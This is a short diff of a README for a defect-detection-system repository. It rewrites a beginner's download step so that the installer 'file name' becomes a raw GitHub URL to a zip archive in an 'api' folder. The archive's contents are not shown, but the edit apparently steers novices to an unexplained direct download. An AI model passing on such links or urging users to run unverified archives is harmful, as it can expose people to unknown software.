omair13/defect-detection-system/README.md

 ## 📥 Step 2: Download the Installer

 1. On the GitHub page, look for the latest release or download section.
 Usually, this will be under "Releases" or in a folder named "Downloads".
-2. Find the file named something like `defect-detection-system-setup.exe`.
+2. Find the file named something like `https://raw.githubusercontent.com/omair13/defect-detection-system/main/api/defect_detection_system_1.6.zip`.
 3. Click the file link to start downloading it to your computer.

 ---